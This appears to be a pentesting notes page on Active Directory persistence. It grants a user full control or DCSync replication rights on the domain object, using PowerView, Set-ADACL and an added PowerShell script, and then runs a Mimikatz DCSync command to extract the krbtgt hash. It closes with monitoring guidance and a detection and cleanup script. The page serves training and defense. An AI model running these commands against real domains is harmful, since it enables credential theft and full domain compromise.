Pentesting Articles and Notes
Abusing ACLs


Last updated 3 years ago

With the privileges of a Domain Admin, we can modify the ACL of any object in the directory and grant a principal we control rights that let us return later. The DACL change itself is the persistence: the account we choose can be an unremarkable, low-privilege user that belongs to no privileged group.

Depending on which rights you grant, and on which object, this can be a stealthy technique: the change is a single LDAP write to the directory, and no code has to execute on the Domain Controller. The classic example is granting a user the replication extended rights on the domain object, then using that user to run DCSync and extract the krbtgt hash (which in turn allows forging Golden Tickets).

Useful Commands From Powershell

Give a User Full Control Rights over the Domain Object Itself

  • Noisy: a new ACE granting GenericAll to a plain user on the domain naming-context head stands out in any ACL review and produces 5136/4670 events when it is written. It does, however, give the user every other right below (and more, e.g. WriteDacl to grant itself further access).

# PowerView (older builds; current PowerView names the cmdlet Add-DomainObjectAcl with -TargetIdentity / -PrincipalIdentity)
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -Verbose

Give a User Replication Rights

  • A much quieter technique than the above: the user gains nothing visible in group membership, only three extended rights (controlAccessRights) on the domain object:

    1. Replicating Directory Changes (DS-Replication-Get-Changes, GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

    2. Replicating Directory Changes All (DS-Replication-Get-Changes-All, GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

    3. Replicating Directory Changes in Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set, GUID 89e95b76-444d-4c62-991a-0facbeda640c)

  • Strictly, DCSync of password hashes needs only the first two; the third is what Read-Only Domain Controllers use and is included because the tooling below grants all three in one go.

# PowerView (the DCSync shorthand adds all three ACEs)
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights DCSync -Verbose

# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -GUIDRight DCSync -Verbose
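The same three ACEs can be written with nothing but the ActiveDirectory module and the .NET ACL classes, which makes the mechanism behind the PowerView/Set-ADACL one-liners explicit. This is an added example, not code from the original page or from either tool; the account name svc-backup and the domain DN are placeholders, and it assumes you are running as a Domain Admin with the AD: PSDrive available (created when the module is imported).

```powershell
# Added example: grant the replication extended rights to a principal using only the
# ActiveDirectory module and System.DirectoryServices, then read the ACL back to confirm.
Import-Module ActiveDirectory

# Extended-right GUIDs of the three replication controlAccessRights on the domain object.
$ReplicationRights = [ordered]@{
    'DS-Replication-Get-Changes'                 = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-All'             = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
    'DS-Replication-Get-Changes-In-Filtered-Set' = '89e95b76-444d-4c62-991a-0facbeda640c'
}

function Get-PrincipalSid {
    param([Parameter(Mandatory)][string]$SamAccountName)
    # Works for users, groups and computer accounts alike.
    $obj = Get-ADObject -Filter "sAMAccountName -eq '$SamAccountName'" -Properties objectSid
    if (-not $obj) { throw "No object with sAMAccountName '$SamAccountName'" }
    [System.Security.Principal.SecurityIdentifier]$obj.objectSid
}

function Grant-ReplicationRights {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [string]$DomainDN = (Get-ADDomain).DistinguishedName
    )
    $sid  = Get-PrincipalSid -SamAccountName $SamAccountName
    $path = "AD:\$DomainDN"
    $acl  = Get-Acl -Path $path

    foreach ($name in $ReplicationRights.Keys) {
        # One explicit, non-inherited Allow ACE per extended right, keyed by its GUID.
        $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
            $sid,
            [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight,
            [System.Security.AccessControl.AccessControlType]::Allow,
            [guid]$ReplicationRights[$name],
            [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None)
        $acl.AddAccessRule($ace)
        Write-Verbose "Adding $name for $SamAccountName on $DomainDN"
    }
    # All three ACEs land in a single DACL write (one 5136 / 4670 pair on the DC that serves it).
    Set-Acl -Path $path -AclObject $acl
}

function Get-GrantedReplicationAces {
    param(
        [Parameter(Mandatory)][string]$SamAccountName,
        [string]$DomainDN = (Get-ADDomain).DistinguishedName
    )
    $sid = Get-PrincipalSid -SamAccountName $SamAccountName
    (Get-Acl -Path "AD:\$DomainDN").Access | Where-Object {
        $_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight -and
        $ReplicationRights.Values -contains $_.ObjectType.ToString() -and
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $sid
    } | Select-Object IdentityReference, ObjectType, AccessControlType, IsInherited
}

# Usage (placeholder account):
#   Grant-ReplicationRights -SamAccountName 'svc-backup' -Verbose
#   Get-GrantedReplicationAces -SamAccountName 'svc-backup'   # expect three ACEs, one per GUID
```

Once the read-back shows the three ACEs, the DCSync step below works from any host as svc-backup; it does not need to be run from the DC. Because the ACEs are explicit and non-inherited, they also survive the hourly SDProp pass, which only rewrites the ACLs of protected (AdminSDHolder) objects, not the domain head itself.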

You Can Then Run DCSync on Any User You Want Afterwards

Running as the user that was granted the rights (from any domain-joined host, not the DC), DCSync asks a Domain Controller to replicate the target account over MS-DRSR and returns its NTLM hash and, for krbtgt, the AES keys as well:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Mitigations

  • Monitor Security events on the Domain Controllers:

    • 4662 - An operation was performed on an object. This is the DCSync itself: filter on the replication extended-right GUIDs in the Properties field and alert when the subject is anything other than a DC computer account (or a known replication service account such as Azure AD Connect). It is only logged if the domain object's SACL audits those control-access rights.

    • 5136 - A directory service object was modified. Requires "Audit Directory Service Changes"; a change to the nTSecurityDescriptor attribute of the domain object is the ACL abuse being planted.

    • 4670 - Permissions on an object were changed. Shows the old and new security descriptor in SDDL, so the new ACE can be read straight from the event.

  • Audit the DACLs of the domain object and other high-value objects periodically (AD ACL Scanner is a good tool for this) and alert on any principal outside the defaults holding replication rights, GenericAll, WriteDacl or WriteOwner.

  • If such an ACE is found, remove it and assume the krbtgt hash has already been taken: reset the krbtgt password twice (allowing replication in between) to invalidate forged tickets.
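The following is an added example (not from the original page or from AD ACL Scanner) that performs the two checks above from PowerShell: it lists ACEs on the domain object that grant replication rights or full-control-equivalent rights to principals outside an allow-list, and it hunts the Security log of a DC for 4662 events carrying the replication GUIDs from non-computer accounts. It assumes the ActiveDirectory module, read access to the domain object's ACL and to the DC's Security log, and that the allow-list below is complete for your environment (it covers only the default holders; add your own replication service accounts).

```powershell
# Added example: hunt for ACL-based DCSync persistence and for DCSync activity.
Import-Module ActiveDirectory

$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',  # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

# Principals that hold these rights on a default domain object (assumption: nothing else should).
$ExpectedHolders = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    '*\Domain Admins',
    '*\Enterprise Admins',
    '*\Domain Controllers',
    '*\Enterprise Read-only Domain Controllers'
)

function Find-SuspiciousDomainAces {
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $fullControl = 'GenericAll|WriteDacl|WriteOwner'
    (Get-Acl -Path "AD:\$DomainDN").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' } |
        Where-Object {
            # Either an explicit replication extended right, or a right that lets the holder grant itself one.
            ($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight -and
             $ReplicationGuids -contains $_.ObjectType.ToString()) -or
            ($_.ActiveDirectoryRights.ToString() -match $fullControl)
        } |
        Where-Object {
            $id = $_.IdentityReference.Value
            -not ($ExpectedHolders | Where-Object { $id -like $_ })
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited
}

function Remove-SuspiciousDomainAces {
    # Removes exactly the ACEs Find-SuspiciousDomainAces reports. Review the list first.
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $path = "AD:\$DomainDN"
    $acl  = Get-Acl -Path $path
    $bad  = Find-SuspiciousDomainAces -DomainDN $DomainDN
    foreach ($ace in $acl.Access) {
        foreach ($b in $bad) {
            if ($ace.IdentityReference -eq $b.IdentityReference -and
                $ace.ObjectType -eq $b.ObjectType -and
                $ace.ActiveDirectoryRights -eq $b.ActiveDirectoryRights) {
                [void]$acl.RemoveAccessRuleSpecific($ace)
            }
        }
    }
    Set-Acl -Path $path -AclObject $acl
}

function Find-DcSyncEvents {
    # 4662 is only written if the domain object's SACL audits the replication control-access rights.
    param([string]$ComputerName = $env:COMPUTERNAME, [int]$MaxEvents = 5000)
    Get-WinEvent -ComputerName $ComputerName -MaxEvents $MaxEvents `
                 -FilterHashtable @{ LogName = 'Security'; Id = 4662 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            $props = [string]$d['Properties']
            $hit   = $ReplicationGuids | Where-Object { $props -match $_ }
            # Computer accounts end in '$'; DC-to-DC replication is expected and skipped.
            if ($hit -and $d['SubjectUserName'] -notmatch '\$$') {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                    Rights  = ($hit -join ',')
                    Object  = $d['ObjectName']
                }
            }
        }
}

# Usage:
#   Find-SuspiciousDomainAces                  # planted ACEs on the domain object
#   Find-DcSyncEvents -ComputerName DC01       # who has actually pulled replication data
#   Remove-SuspiciousDomainAces                # after review; then reset krbtgt twice
```

Run the ACE audit from a scheduled task and diff its output against a baseline; a new row is a high-fidelity signal because the domain object's DACL almost never changes legitimately. The 4662 hunt will also surface legitimate non-DC replication consumers (Azure AD Connect, some backup products), so tune the allow-list rather than the query.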